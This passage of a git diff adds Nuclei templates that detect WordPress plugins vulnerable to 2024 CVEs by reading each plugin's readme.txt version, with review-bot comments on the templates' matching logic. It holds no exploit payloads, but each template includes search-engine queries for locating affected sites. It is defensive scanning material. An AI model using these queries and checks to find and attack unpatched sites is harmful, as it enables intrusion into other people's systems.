+ + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bdthemes-element-pack-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.10.2') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10510.yaml b/poc/cve/CVE-2024-10510.yaml new file mode 100644 index 0000000000..9741b21767 --- /dev/null +++ b/poc/cve/CVE-2024-10510.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-10510-78ba2ace6fdbb75ae1b6ae5ea60bf1ea
+
+info:
+ name: >
+ adBuddy+ (AdBlocker Detection) by NetfunkDesign <= 1.1.3 - Authenticated (Admin+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The adBuddy+ (AdBlocker Detection) by NetfunkDesign plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fd0a887-db61-4b2d-af52-ec1d9c525663?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-10510
+ metadata:
+ fofa-query: "wp-content/plugins/adbuddy-adblocker-detection/"
+ google-query: inurl:"/wp-content/plugins/adbuddy-adblocker-detection/"
+ shodan-query: 'vuln:CVE-2024-10510'
+ tags: cve,wordpress,wp-plugin,adbuddy-adblocker-detection,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/adbuddy-adblocker-detection/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "adbuddy-adblocker-detection"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10517.yaml b/poc/cve/CVE-2024-10517.yaml
new file mode 100644
index 0000000000..4f51067ec2
--- /dev/null
+++ b/poc/cve/CVE-2024-10517.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10517-210079a1dc04e7802385a59afa112a94
+
+info:
+ name: >
+ ProfilePress <= 4.15.14 - Authenticated (Admin+) Stored Cross-Site Scripting via "Labels"
+ author: topscoder
+ severity: low
+ description: >
+ The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via "Label" settings in all versions up to, and including, 4.15.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/91291608-5aa4-4fa1-b0d8-2b94d3d46f9c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-10517
+ metadata:
+ fofa-query: "wp-content/plugins/wp-user-avatar/"
+ google-query: inurl:"/wp-content/plugins/wp-user-avatar/"
+ shodan-query: 'vuln:CVE-2024-10517'
+ tags: cve,wordpress,wp-plugin,wp-user-avatar,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-user-avatar/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-user-avatar"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.15.14')
\ No newline at end of file
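Review bot: The `Stable tag: ([0-9.]+)` pattern used by both extractors accepts only a single space after the colon and only a numeric value. A readme that uses a tab or extra spaces, or declares `Stable tag: trunk`, leaves `version` unset, and the `compare_versions` matcher then presumably evaluates false, which is a silent false negative on a site that may still run 4.15.14 or older. Loosening the pattern to `"(?mi)Stable tag:[ \t]*([0-9.]+)"` covers the whitespace case. The `trunk` case needs another version source, so it is worth a template comment such as `# no result when readme.txt declares "Stable tag: trunk"`. Every template added in this patch carries the same two extractors.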
diff --git a/poc/cve/CVE-2024-10518.yaml b/poc/cve/CVE-2024-10518.yaml
new file mode 100644
index 0000000000..0687aca9ff
--- /dev/null
+++ b/poc/cve/CVE-2024-10518.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10518-8fbb12f5bd52a37d5ae88c83f3c10fed
+
+info:
+ name: >
+ ProfilePress <= 4.15.14 - Authenticated (Admin+) Stored Cross-Site Scripting via "Product Files"
+ author: topscoder
+ severity: low
+ description: >
+ The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via "Product Files" settings in all versions up to, and including, 4.15.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a6320203-2ee8-4316-96bc-0a8e1dd6b66a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-10518
+ metadata:
+ fofa-query: "wp-content/plugins/wp-user-avatar/"
+ google-query: inurl:"/wp-content/plugins/wp-user-avatar/"
+ shodan-query: 'vuln:CVE-2024-10518'
+ tags: cve,wordpress,wp-plugin,wp-user-avatar,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-user-avatar/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-user-avatar"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.15.14')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10568.yaml b/poc/cve/CVE-2024-10568.yaml
new file mode 100644
index 0000000000..8b0c784427
--- /dev/null
+++ b/poc/cve/CVE-2024-10568.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10568-9765873fc9eb5df11bad8c11c4bb8f5f
+
+info:
+ name: >
+ Ajax Search Lite <= 4.12.3 - Authenticated (Admin+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Ajax Search Lite – Live Search & Filter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.12.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/10c31c9c-ada9-43b5-a595-ca00b12d6840?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-10568
+ metadata:
+ fofa-query: "wp-content/plugins/ajax-search-lite/"
+ google-query: inurl:"/wp-content/plugins/ajax-search-lite/"
+ shodan-query: 'vuln:CVE-2024-10568'
+ tags: cve,wordpress,wp-plugin,ajax-search-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ajax-search-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ajax-search-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.12.3')
\ No newline at end of file
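Review bot: `redirects: true` with `max-redirects: 3` lets the request follow a redirect to a different host, and the status, word and version matchers then run against whatever that host returns. A readme served from another site would be reported as a finding on `{{BaseURL}}`. Replacing `redirects: true` with `host-redirects: true` keeps the follow-up requests on the scanned host. The same request block is repeated in every template added by this patch.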
diff --git a/poc/cve/CVE-2024-10646-6a5f696424113cce85ff733ae3bc98b0.yaml b/poc/cve/CVE-2024-10646-6a5f696424113cce85ff733ae3bc98b0.yaml
new file mode 100644
index 0000000000..e8017cc08b
--- /dev/null
+++ b/poc/cve/CVE-2024-10646-6a5f696424113cce85ff733ae3bc98b0.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10646-6a5f696424113cce85ff733ae3bc98b0
+
+info:
+ name: >
+ Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.2.6 - Unauthenticated Stored Cross-Site Scripting via Form Subject
+ author: topscoder
+ severity: high
+ description: >
+ The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form's subject parameter in all versions up to, and including, 5.2.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/41c2ec31-360d-4145-b0b4-77d4d1d4b8a1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cve-id: CVE-2024-10646
+ metadata:
+ fofa-query: "wp-content/plugins/fluentform/"
+ google-query: inurl:"/wp-content/plugins/fluentform/"
+ shodan-query: 'vuln:CVE-2024-10646'
+ tags: cve,wordpress,wp-plugin,fluentform,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "fluentform"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.2.6')
\ No newline at end of file
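Review bot: The two `regex` extractors under `extractors:` are identical apart from `internal: true` and share the name `version`, which reads like a copy-paste slip to anyone maintaining the template. If the first feeds the `dsl` matcher and the second only prints the version in results, the second one should say so with a comment above it, e.g. `# reported copy of the version; the internal extractor above feeds compare_versions`. The same pair appears in all the templates in this patch.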
diff --git a/poc/cve/CVE-2024-10690-9e8bc3f90f0d2a14268c428a04063b03.yaml b/poc/cve/CVE-2024-10690-9e8bc3f90f0d2a14268c428a04063b03.yaml
new file mode 100644
index 0000000000..c7b9b8d36a
--- /dev/null
+++ b/poc/cve/CVE-2024-10690-9e8bc3f90f0d2a14268c428a04063b03.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-10690-9e8bc3f90f0d2a14268c428a04063b03 + +info: + name: > + Shortcodes for Elementor <= 1.0.4 - Authenticated (Contributor+) Post Disclosure + author: topscoder + severity: low + description: > + The Shortcodes for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.4 via the 'SHORTCODE_ELEMENTOR' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private and draft posts created with Elementor that they should not have access to. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5debe121-6373-4b56-8441-f0d4a5920089?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10690 + metadata: + fofa-query: "wp-content/plugins/shortcode-elementor/" + google-query: inurl:"/wp-content/plugins/shortcode-elementor/" + shodan-query: 'vuln:CVE-2024-10690' + tags: cve,wordpress,wp-plugin,shortcode-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/shortcode-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "shortcode-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10704.yaml b/poc/cve/CVE-2024-10704.yaml new file mode 100644 index 0000000000..b9684519d8 --- /dev/null +++ b/poc/cve/CVE-2024-10704.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-10704-a70e8bbf9a1e090c995118fbf05ef043
+
+info:
+ name: >
+ Photo Gallery by 10Web – Mobile-Friendly Image Gallery <= 1.8.30 - Authenticated (Admin+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Photo Gallery by 10Web – Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Gallery Titles in all versions up to, and including, 1.8.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b1bc2300-bd8d-4e4a-8ab5-a541f62133ca?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-10704
+ metadata:
+ fofa-query: "wp-content/plugins/photo-gallery/"
+ google-query: inurl:"/wp-content/plugins/photo-gallery/"
+ shodan-query: 'vuln:CVE-2024-10704'
+ tags: cve,wordpress,wp-plugin,photo-gallery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/photo-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "photo-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.30')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10708.yaml b/poc/cve/CVE-2024-10708.yaml new file mode 100644 index 0000000000..dea31c85ef --- /dev/null +++ b/poc/cve/CVE-2024-10708.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10708-a94086c9c44731fdca495f410cfc1b1e + +info: + name: > + System Dashboard <= 2.8.14 - Authenticated (Admin+) Arbitrary File Read + author: topscoder + severity: low + description: > + The System Dashboard plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.8.14 via the 'sd_viewer' action. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/69aa2287-3d26-43e2-a2d0-4985ed17d096?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-10708 + metadata: + fofa-query: "wp-content/plugins/system-dashboard/" + google-query: inurl:"/wp-content/plugins/system-dashboard/" + shodan-query: 'vuln:CVE-2024-10708' + tags: cve,wordpress,wp-plugin,system-dashboard,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/system-dashboard/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "system-dashboard" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10783.yaml b/poc/cve/CVE-2024-10783.yaml new file mode 100644 index 0000000000..85918875df --- /dev/null 
+++ b/poc/cve/CVE-2024-10783.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10783-194d14e49a97ce9ed7766354ddcc8c6e + +info: + name: > + MainWP Child <= 5.2 - Missing Authorization to Unauthenticated Privilege Escalation + author: topscoder + severity: high + description: > + The MainWP Child – Securely Connects to the MainWP Dashboard to Manage Multiple Sites plugin for WordPress is vulnerable to privilege escalation due to a missing authorization checks on the register_site function in all versions up to, and including, 5.2 when a site is left in an unconfigured state. This makes it possible for unauthenticated attackers to log in as an administrator on instances where MainWP Child is not yet connected to the MainWP Dashboard. IMPORTANT: this only affects sites who have MainWP Child installed and have not yet connected to the MainWP Dashboard, and do not have the unique security ID feature enabled. Sites already connected to the MainWP Dashboard plugin and do not have the unique security ID feature enabled, are NOT affected and not required to upgrade. Please note 5.2.1 contains a partial patch, though we consider 5.3 to be the complete patch. 
+ reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9156e536-a58e-4d78-b136-af8a9613ee23?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-10783 + metadata: + fofa-query: "wp-content/plugins/mainwp-child/" + google-query: inurl:"/wp-content/plugins/mainwp-child/" + shodan-query: 'vuln:CVE-2024-10783' + tags: cve,wordpress,wp-plugin,mainwp-child,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mainwp-child/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mainwp-child" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10893.yaml b/poc/cve/CVE-2024-10893.yaml new file mode 100644 index 0000000000..713a219599 --- /dev/null +++ b/poc/cve/CVE-2024-10893.yaml 
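Review bot: The only vulnerability test in the MainWP Child template is `compare_versions(version, '<= 5.2')`, so it reports a `high` finding for any site whose readme shows an old version. The description limits the issue to installs not yet connected to the MainWP Dashboard and without the unique security ID feature, and the request does not check that state. A comment above `http:` such as `# version check only: does not verify the unconnected state the advisory requires` would tell the operator that a hit means "version in affected range", not confirmed exposure. The description also calls 5.2.1 a partial patch and 5.3 the complete one, so decide whether 5.2.1 should be reported, e.g. with `compare_versions(version, '< 5.3')`.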
@@ -0,0 +1,59 @@ +id: CVE-2024-10893-a8b2ddc814e2620ef1ea708f58ef3008 + +info: + name: > + WP Booking Calendar <= 10.6.4 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 10.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f6c74bcb-b41d-4a4f-97d5-b92a3bfc794d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-10893 + metadata: + fofa-query: "wp-content/plugins/booking/" + google-query: inurl:"/wp-content/plugins/booking/" + shodan-query: 'vuln:CVE-2024-10893' + tags: cve,wordpress,wp-plugin,booking,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/booking/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "booking" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 10.6.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10896.yaml b/poc/cve/CVE-2024-10896.yaml new file mode 100644 index 0000000000..6b8ec460f0 --- /dev/null +++ b/poc/cve/CVE-2024-10896.yaml 
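Review bot: The word matcher `"booking"` in the WP Booking Calendar template is generic, so almost any text that mentions bookings satisfies it and it adds little to the `and` condition. A matcher tied to the plugin's readme header would be tighter. The header text is not visible in this patch and has to be taken from the plugin's readme.txt, e.g. `- "=== <plugin title from readme.txt> ==="`. The slug-based words in the other templates (for example `"wp-user-avatar"` for ProfilePress) carry the opposite risk: if the slug never appears in the readme body, a truly affected site is not reported.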
@@ -0,0 +1,59 @@ +id: CVE-2024-10896-b87b742b653c072456023acb4e76af1e + +info: + name: > + Logo Slider <= 4.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Logo Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the "Brand Name" field in all versions up to, and including, 4.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6cc17a6-994c-4ac4-8175-263add849b1b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10896 + metadata: + fofa-query: "wp-content/plugins/cb-logo-slider/" + google-query: inurl:"/wp-content/plugins/cb-logo-slider/" + shodan-query: 'vuln:CVE-2024-10896' + tags: cve,wordpress,wp-plugin,cb-logo-slider,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cb-logo-slider/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cb-logo-slider" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10980.yaml b/poc/cve/CVE-2024-10980.yaml new file mode 100644 index 0000000000..ecbf888bd2 --- /dev/null +++ b/poc/cve/CVE-2024-10980.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10980-e93e9bf451e7535bca72e467980f5955 + +info: + name: > + Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) <= 5.10.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'Cookie Consent' + author: topscoder + severity: low + description: > + The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Cookie Consent block in all versions up to, and including, 5.10.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/71f78fef-50f6-49d5-94f6-6d0cf1b8f536?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10980 + metadata: + fofa-query: "wp-content/plugins/bdthemes-element-pack-lite/" + google-query: inurl:"/wp-content/plugins/bdthemes-element-pack-lite/" + shodan-query: 'vuln:CVE-2024-10980' + tags: cve,wordpress,wp-plugin,bdthemes-element-pack-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bdthemes-element-pack-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bdthemes-element-pack-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.10.2') \ No 
newline at end of file diff --git a/poc/cve/CVE-2024-11012.yaml b/poc/cve/CVE-2024-11012.yaml new file mode 100644 index 0000000000..38f7e55c58 --- /dev/null +++ b/poc/cve/CVE-2024-11012.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11012-07fb523fa0ee4232af334e98e3c26772 + +info: + name: > + Notibar – Notification Bar for WordPress <= 2.1.4 - Authenticated (Subscriber+) Arbitrary Shortcode Execution via njt_nofi_text + author: topscoder + severity: low + description: > + The The Notibar – Notification Bar for WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution via njt_nofi_text AJAX action in all versions up to, and including, 2.1.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1766727d-ba54-4b46-b362-415c14be027d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L + cvss-score: 6.3 + cve-id: CVE-2024-11012 + metadata: + fofa-query: "wp-content/plugins/notibar/" + google-query: inurl:"/wp-content/plugins/notibar/" + shodan-query: 'vuln:CVE-2024-11012' + tags: cve,wordpress,wp-plugin,notibar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/notibar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "notibar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.4') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml b/poc/cve/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml
new file mode 100644
index 0000000000..40163d028a
--- /dev/null
+++ b/poc/cve/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-11095-b0165142a699db32c27db406fb189dac + +info: + name: > + Visualmodo Elements <= 1.0.2 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Visualmodo Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/49005688-fa40-458d-9c96-5ec2ca7adcd3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11095 + metadata: + fofa-query: "wp-content/plugins/visualmodo-elements/" + 